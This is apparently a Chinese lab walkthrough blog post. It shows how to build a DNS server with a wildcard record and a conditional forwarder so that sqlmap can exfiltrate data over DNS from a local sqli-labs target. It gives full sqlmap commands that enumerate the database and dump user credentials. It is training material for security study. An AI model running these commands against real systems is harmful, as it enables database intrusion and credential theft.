码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • sqlmap dolog外带数据


    目录

    • 前提准备
    • 一、Kali准备工作【作为攻击机】
      • 1、修改secure_file_priv
      • 2、kali启用数据库,查看状态
      • 3、查看sqlmap是否可用
    • 二、Windows Server 2008R2 为DNS服务器准备工作【DNS服务器起中转作用,最后回归sqlmap】
      • 1、创建角色
      • 2、新建区域
      • 3、新建服务器属性修改
      • 4、添加A记录
      • 5、测试是否可以解析
        • 1、kali监听53端口
        • 2、配置DNS服务器ip信息和dns信息
        • 3、靶机保证win11的首选DNS与DNS服务器一致
        • 4、本机ping域名8r2.top的子域名
        • 5、看kali是否能收到转发
      • 6、条件转发器
        • 1、创建条件转发器
        • 2、输入域与IP
    • 三、kali注入
      • 1、找寻目标主机
      • 2、在主机搭建好环境
      • 3、kali作为攻击机,攻击win11的目标网站,使用sqlmap dnslog外带数据方式进行攻击
        • 1、得到库
        • 2、查出表
        • 3、查出列
        • 4、查出列内容
    • 四、总结
      • 1、优点
      • 2、注入过程原理及其要点

    前提准备

    实验所用环境:

    DNS服务器虚拟机系统:Windows Server 2008R2
    Kali版本: 2022.2
    Windows系统虚拟机:Windows 11+apache+mysql+php

    首先要进行这次实验,我们电脑和虚拟机要带有sqlmap工具。

    Windows系统

    windows系统使用sqlmap工具官网下载即可,将下载包解压使用命令提示符打开【快捷键:window+R】。到达相应路径使用python语言打开即可。
    在这里插入图片描述

    虚拟机

    虚拟机自带sqlmap工具。只需要直接在命令行中输入sqlmap就可以了。
    在这里插入图片描述
    如果版本低了可以输入sqlmap -update更新版本
    在这里插入图片描述
    如果输入sqlmap -update没有反应可以尝试参考博客:kali自带的sqlmap更新

    在本次实验要使用mysql的读文件函数load_file,为此Load_file函数读mysql 的文件,但是要生效得 secure_file_priv不能是null才可以使用。
    在这里插入图片描述

    原因: 为null就既不能读文件也不能写文件是mysql的安全配置。 要改必须去配置文件修改,因为这里是只读的权限
    添加 :
    secure_file_priv=“”
    local_infile=1
    在这里插入图片描述
    重启mysql服务

    在这里插入图片描述

    一、Kali准备工作【作为攻击机】

    kali准备工作这里不写sqlmap更新。因为博主已经更新到目前最新的了

    1、修改secure_file_priv

    因为前面已经说了这个只有读权限,为此要修改要去配置文件my.cnf
    。
    在这里插入图片描述
    文件内添加内容:
    在这里插入图片描述

    2、kali启用数据库,查看状态

    在这里插入图片描述
    查看是否修改了状态
    在这里插入图片描述

    3、查看sqlmap是否可用

    在这里插入图片描述
    成功启动并且版本为1.6.7

    二、Windows Server 2008R2 为DNS服务器准备工作【DNS服务器起中转作用,最后回归sqlmap】

    1、创建角色

    服务器角色

    创建服务器为DNS服务器
    在这里插入图片描述

    DNS服务器选择完就可以一直下一步了。

    在这里插入图片描述

    2、新建区域

    建立一个主要区域

    在这里插入图片描述

    勾选主要区域

    在这里插入图片描述

    区域名称【输入你想的就可以】

    在这里插入图片描述

    后面一直无脑下一步就创建就成功了

    在这里插入图片描述

    3、新建服务器属性修改

    进入WIN-5SSIPA6V1CH属性修改
    在这里插入图片描述

    在高级中查看递归十分禁用,因为我们要使用递归获取数据。【不要勾选禁用递归】

    在这里插入图片描述

    在监视中将两个测试类型勾选。

    在这里插入图片描述

    监视与高级的操作都是保证我们能正常使用递归查询

    4、添加A记录

    目的:sqlmap
    在这里插入图片描述

    ip地即被解析,由NS服务器解析。即这台服务器,如此这ip地址填写sqlmap地址。
    sqlmap地址为kali地址:192.168.171.152
    在这里插入图片描述

    添加IP地址

    在这里插入图片描述

    完成后再创建一个泛解析

    在这里插入图片描述

    最后即两个都解析到了kali上
    在这里插入图片描述

    5、测试是否可以解析

    1、kali监听53端口

    	tcpdump -n port 53
    
    • 1

    在这里插入图片描述

    2、配置DNS服务器ip信息和dns信息

    在这里插入图片描述

    3、靶机保证win11的首选DNS与DNS服务器一致

    在这里插入图片描述

    4、本机ping域名8r2.top的子域名

    在这里插入图片描述

    5、看kali是否能收到转发

    在这里插入图片描述

    这能收到因为我们设置的*泛解析,为此对所有的8r2.top的域名都会到192.168.171.153主机解析

    6、条件转发器

    1、创建条件转发器

    在这里插入图片描述

    2、输入域与IP

    在这里插入图片描述

    DNS域是转发器的,所有你可以随便输入,
    IP地址则是触发条件转发器的转发对象,即kali
    在这里插入图片描述

    三、kali注入

    1、找寻目标主机

    对win11的靶机进行注入,win11的ip地址为:192.168.171.131
    在这里插入图片描述

    2、在主机搭建好环境

    在win11上使用phpstudy集成环境搭建WAMP。

    目标网站
    在这里插入图片描述

    在win11中修改了文件my.ini的secure_file_priv为非NULL
    在这里插入图片描述
    重启mysql服务,重新读取my.ini

    3、kali作为攻击机,攻击win11的目标网站,使用sqlmap dnslog外带数据方式进行攻击

    1、得到库

    sqlmap -u "192.168.171.131/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "alxy.top" --dbs 
    
    • 1

    -dbs (获取数据库的所有库)
    –dns-domain的参数要设置为条件转发器中的域名
    sqllabs的库名是security

    在这里插入图片描述

    2、查出表

    sqlmap -u "192.168.171.131/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "alxy.top" -D security --tables
    
    • 1

    –dns-domain的参数要设置为条件转发器中的域名

    sqllabs的库名是security

    在这里插入图片描述

    3、查出列

    sqlmap -u "192.168.171.131/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "alxy.top" -D security -t users --columns
    
    • 1

    在这里插入图片描述

    4、查出列内容

    qlmap -u "192.168.171.131/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "alxy.top" -D security -T users -C  username,password --dump
    
    • 1

    在这里插入图片描述

    四、总结

    1、优点

    dnslog外带数据注入,相比较于布尔盲注和时间盲注的耗时量来看要快上许多。
    即dnslog外带数据能快速完成了sql注入,取得了security.users中的数据

    2、注入过程原理及其要点

    Kail ,靶机与DNS间传输

    1、kali的IP与DNS 一直没有改变
    2、DNS配置的IP地址 的DNS与kali 保持一致
    3、靶机实际上:解析本地hosts -------本地没有—》DNS解析。
    4、访问过程
    靶机【win11】 本地无法解析
    =》DNS 【因为DNS配置A记录指向了kali】
    =》 传输信息给到kali 【kali中的sqlmap将受到的信息进行解析】=》sqlmap解析的数据将其显示,显示的内容放入kali的log,每次解析都会覆盖一次这个log

    如此:
    靶机 解析8r2.top 到DNS 。DNS的A记录【泛解析:*】中指向kali。
    如此kali中sqlmap解析了数据而kali把内容存入日志了。 然后通过–doman [ip,条件解析地址]
    在条件转发器下通过DNS获取消息。即触发条件解析地址数据指向Kali的地址。

  • 相关阅读:
    lint题目120 单词接龙 实现
    算法训练 第一周
    低代码与数字经济:推动软件开发创新的新引擎
    矩阵分析与应用+张贤达
    SpringClouldAlibaba 之 Sentinel流控规则同步到nacos(并重新生成镜像)
    Xcode自定义快捷键
    java毕业设计项目选题springboot汉赛汽车租赁平台
    知识问答产品利器:文本分段器实现自动知识加工
    发布Android库至MavenCentral详解
    web网页设计期末课程大作业 HTML+CSS+JavaScript 美食餐饮文化主题网站设计 学生DW静态网页设计
  • 原文地址:https://blog.csdn.net/Miracle_ze/article/details/126161379
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号